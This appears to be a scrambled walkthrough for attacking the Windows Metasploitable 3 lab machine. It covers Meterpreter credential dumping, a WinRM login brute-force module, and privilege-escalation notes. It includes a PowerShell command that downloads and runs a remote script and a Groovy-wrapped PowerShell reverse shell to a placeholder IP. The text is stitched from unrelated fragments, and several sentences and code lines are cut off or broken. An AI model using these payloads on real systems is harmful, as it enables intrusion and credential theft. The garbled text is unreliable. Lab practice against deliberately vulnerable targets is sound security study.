Metasploitable 3 often runs a GlassFish server. This is a common entry point.
Set up listener on Kali:
meterpreter > creds_msv
meterpreter > creds_kerberos
meterpreter > creds_wdigest
Then choose a module like exploit/windows/local/ms16_032_secondary_logon_handle.
msf6 > use auxiliary/scanner/winrm/winrm_login
msf6 auxiliary(scanner/winrm/winrm_login) > set RHOSTS [target_ip]
msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME vagrant
msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD vagrant
msf6 auxiliary(scanner/winrm/winrm_login) > run
allow for similar RCE vectors, highlighting the danger of unpatched middleware in a Windows environment.

Phase III: Post-Exploitation and Lateral Movement

Once a shell is established, the focus shifts to Enumeration. In Windows, this involves identifying:
User Context: whoami /priv to see enabled privileges like SeImpersonatePrivilege
Network Connections: netstat -ano to find internal services not exposed to the outside.
Stored Credentials: Searching for unattend.xml files or credentials stored in registry keys.
Metasploitable 3 intentionally includes the ManageEngine Desktop Central
powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http:// /PowerUp.ps1'); Invoke-AllChecks"

Exploiting AlwaysInstallElevated
While modern Windows is more resilient, the 2012 R2 base allows for older exploits if updates are withheld.
Token Impersonation: If the initial foothold is a service account, tools like can be used to steal tokens from logged-in administrators.

Conclusion: Lessons in Modern Vulnerability
This walkthrough for the Windows version of Metasploitable 3
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c powershell.exe -nop -w hidden -c $client = New-Object System.Net.Sockets.TCPClient("YOUR_IP",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%0;while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0) Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.length);$stream.Flush();$client.Close()'.execute()
proc.consumeProcessOutput(sout, serr)
// Groovy's Process method is waitForOrKill(long); the page's "waitForOr" is a truncated name
proc.waitForOrKill(1000)
Use the to identify unpatched kernel exploits:
If a path contains spaces without quotes (e.g., C:\Program Files\Vuln App\service.exe ), Windows resolves the first token, allowing an attacker to place a malicious executable earlier in the path.